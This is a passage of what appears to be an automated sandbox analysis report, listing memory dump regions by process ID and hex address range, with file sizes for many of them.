                                                                                                                                    • memory/1292-172-0x000007FEF1EE0000-0x000007FEF2F76000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      16.6MB

                                                                                                                                    • memory/1292-191-0x00000000009A6000-0x00000000009C5000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      124KB

                                                                                                                                    • memory/1292-160-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1292-192-0x000000001AFA0000-0x000000001AFB9000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      100KB

                                                                                                                                    • memory/1328-128-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1328-131-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      88KB

                                                                                                                                    • memory/1480-274-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1536-286-0x00000000048E2000-0x00000000048E3000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1536-289-0x0000000002730000-0x0000000002731000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1536-288-0x00000000020D0000-0x00000000020D1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1536-287-0x0000000004920000-0x0000000004921000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1536-284-0x0000000001EC0000-0x0000000001EC1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1536-291-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1536-285-0x00000000048E0000-0x00000000048E1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1556-260-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1592-243-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1616-133-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1616-144-0x0000000073AF1000-0x0000000073AF3000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/1616-139-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1636-238-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1680-232-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/1680-235-0x0000000000760000-0x00000000007BC000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      368KB

                                                                                                                                    • memory/1680-234-0x0000000000970000-0x0000000000A71000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      1.0MB

                                                                                                                                    • memory/1680-230-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1712-110-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/1712-107-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1728-245-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1728-126-0x0000000001E10000-0x0000000001E12000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/1728-123-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1772-70-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1772-92-0x0000000001D30000-0x0000000001E31000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      1.0MB

                                                                                                                                    • memory/1772-93-0x0000000001E40000-0x0000000001E9C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      368KB

                                                                                                                                    • memory/1772-91-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/1784-175-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1788-174-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/1788-173-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1800-207-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1800-210-0x00000000002B0000-0x000000000034D000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      628KB

                                                                                                                                    • memory/1800-94-0x0000000000E40000-0x0000000000E42000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/1800-89-0x0000000000240000-0x000000000025C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      112KB

                                                                                                                                    • memory/1800-88-0x0000000000230000-0x0000000000231000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1800-90-0x0000000000260000-0x0000000000261000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1800-86-0x0000000001270000-0x0000000001271000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1800-83-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1888-113-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1888-120-0x00000000003D0000-0x00000000003D1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1928-100-0x00000000FF91246C-mapping.dmp
                                                                                                                                    • memory/1928-101-0x00000000000E0000-0x000000000012B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/1928-102-0x00000000004A0000-0x0000000000510000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1928-121-0x0000000002FF0000-0x00000000030F1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      1.0MB

                                                                                                                                    • memory/1968-279-0x00000000001B0000-0x00000000001BC000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      48KB

                                                                                                                                    • memory/1968-167-0x00000000000F0000-0x00000000000FD000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      52KB

                                                                                                                                    • memory/1968-165-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1968-264-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1972-150-0x0000000001F80000-0x0000000001F82000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/1972-140-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1980-66-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2004-273-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      72KB

                                                                                                                                    • memory/2004-272-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/2004-270-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2008-312-0x0000000004992000-0x0000000004993000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2008-311-0x0000000004990000-0x0000000004991000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2016-196-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2016-200-0x0000000000BE0000-0x0000000000BE2000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/2016-197-0x000007FEF1EE0000-0x000007FEF2F76000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      16.6MB

                                                                                                                                    • memory/2032-249-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2132-237-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2252-268-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2264-223-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2276-211-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2284-222-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2360-181-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2372-267-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2380-247-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2388-216-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2408-182-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2412-254-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2428-250-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2436-203-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2436-206-0x0000000000260000-0x0000000000261000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2444-306-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2448-183-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2456-195-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2512-305-0x00000000002C0000-0x00000000002C2000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/2512-304-0x00000000002B0000-0x00000000002B1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2516-187-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2520-225-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2524-240-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2532-188-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2540-227-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2544-198-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2544-202-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      72KB

                                                                                                                                    • memory/2544-201-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/2548-228-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2548-256-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2572-242-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2668-261-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2680-263-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2724-252-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2808-253-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2812-293-0x00000000020A0000-0x0000000002CEA000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      12.3MB

                                                                                                                                    • memory/2812-292-0x00000000020A0000-0x0000000002CEA000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      12.3MB

                                                                                                                                    • memory/2832-214-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2900-269-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2928-265-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2936-220-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2972-204-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3020-248-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3032-218-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3048-194-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4152-297-0x00000000024F0000-0x000000000313A000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      12.3MB

                                                                                                                                    • memory/4152-296-0x00000000024F0000-0x000000000313A000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      12.3MB

                                                                                                                                    • memory/7576-298-0x0000000004980000-0x0000000004981000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7576-299-0x0000000004982000-0x0000000004983000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7604-307-0x0000000000AA0000-0x0000000000AA1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7604-308-0x0000000000AA2000-0x0000000000AA3000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7684-301-0x00000000010E2000-0x00000000010E3000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7684-300-0x00000000010E0000-0x00000000010E1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7760-309-0x0000000004AA0000-0x0000000004AA1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7760-310-0x0000000004AA2000-0x0000000004AA3000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7776-303-0x00000000049F2000-0x00000000049F3000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7776-302-0x00000000049F0000-0x00000000049F1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7780-313-0x00000000046F0000-0x00000000046F1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/7780-314-0x00000000046F2000-0x00000000046F3000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/8016-315-0x0000000002390000-0x0000000002FDA000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      12.3MB